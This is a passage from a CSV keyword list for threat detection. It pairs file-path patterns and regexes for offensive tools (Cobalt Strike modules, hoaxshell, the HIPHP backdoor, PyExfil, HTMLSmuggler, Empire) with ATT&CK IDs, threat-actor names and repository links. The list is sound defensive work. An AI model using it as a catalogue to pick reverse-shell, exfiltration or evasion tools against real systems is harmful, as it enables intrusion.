Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/HInvoke.cs*",".{0,1000}\/HInvoke\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*/hiphp.git*",".{0,1000}\/hiphp\.git.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/hiphp-cli.sh*",".{0,1000}\/hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/hiphp-desktop.sh*",".{0,1000}\/hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/hiphp-main*",".{0,1000}\/hiphp\-main.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/HiveDump.ps1*",".{0,1000}\/HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/hlldz*",".{0,1000}\/hlldz.{0,1000}","offensive_tool_keyword","Github Username","github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/hlldz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hnap-info.nse*",".{0,1000}\/hnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hoaxshell.git*",".{0,1000}\/hoaxshell\.git.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*/hoaxshell/*.py*",".{0,1000}\/hoaxshell\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*/holehe.git*",".{0,1000}\/holehe\.git.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*/hollow.x64.*",".{0,1000}\/hollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*/home/app/wstunnel*",".{0,1000}\/home\/app\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/home/daddyShark/BabySh4rk/*",".{0,1000}\/home\/daddyShark\/BabySh4rk\/.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" 
"*/home/lowpriv/*",".{0,1000}\/home\/lowpriv\/.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/home/pyrdp/*",".{0,1000}\/home\/pyrdp\/.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/home/tor2web/*",".{0,1000}\/home\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/HookDetector.exe*",".{0,1000}\/HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/hooks/spoof.c*",".{0,1000}\/hooks\/spoof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/hop.php*",".{0,1000}\/hop\.php.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/horizon3ai/*",".{0,1000}\/horizon3ai\/.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public 
facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*/HostEnum.ps1*",".{0,1000}\/HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/hostenum.py*",".{0,1000}\/hostenum\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/hostmap-bfk.nse*",".{0,1000}\/hostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hostmap-crtsh.nse*",".{0,1000}\/hostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hostmap-robtex.nse*",".{0,1000}\/hostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/HostRecon.ps1*",".{0,1000}\/HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/HouQing/*/Loader.go",".{0,1000}\/HouQing\/.{0,1000}\/Loader\.go","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*/HRShell.git*",".{0,1000}\/HRShell\.git.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/HRShell/*",".{0,1000}\/HRShell\/.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/hta_attack/*",".{0,1000}\/hta_attack\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/HTMLSmuggler.git*",".{0,1000}\/HTMLSmuggler\.git.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*/HTMLSmuggler/*",".{0,1000}\/HTMLSmuggler\/.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*/htshells.git*",".{0,1000}\/htshells\.git.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*/http_exfiltration.py*",".{0,1000}\/http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data 
Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/http_payload.ps1*",".{0,1000}\/http_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*/http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\/http\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-affiliate-id.nse*",".{0,1000}\/http\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-apache-negotiation.nse*",".{0,1000}\/http\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-apache-server-status.nse*",".{0,1000}\/http\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-aspnet-debug.nse*",".{0,1000}\/http\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/httpattack.py*",".{0,1000}\/httpattack\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*/http-auth.nse*",".{0,1000}\/http\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-auth-finder.nse*",".{0,1000}\/http\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-avaya-ipoffice-users.nse*",".{0,1000}\/http\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-awstatstotals-exec.nse*",".{0,1000}\/http\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-axis2-dir-traversal.nse*",".{0,1000}\/http\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-backup-finder.nse*",".{0,1000}\/http\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-barracuda-dir-traversal.nse*",".{0,1000}\/http\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-bigip-cookie.nse*",".{0,1000}\/http\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-brute.nse*",".{0,1000}\/http\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
